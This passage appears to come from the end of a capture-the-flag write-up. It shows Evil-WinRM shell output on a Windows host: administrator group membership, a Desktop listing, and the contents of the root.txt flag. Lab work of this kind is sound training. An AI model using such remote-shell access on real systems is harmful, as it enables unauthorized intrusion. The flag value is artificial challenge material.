Global Group memberships *Domain Users
The command completed successfully.
I have local group membership in Administrators.
*Evil-WinRM* PS C:\users\administrator\Desktop> dir
Directory: C:\users\administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/6/2024 1:34 PM 34 root.txt
*Evil-WinRM* PS C:\users\administrator\Desktop> type root.txt
7b0acc82bbbed94c0da63bdaa810ee96
*Evil-WinRM* PS C:\users\administrator\Desktop>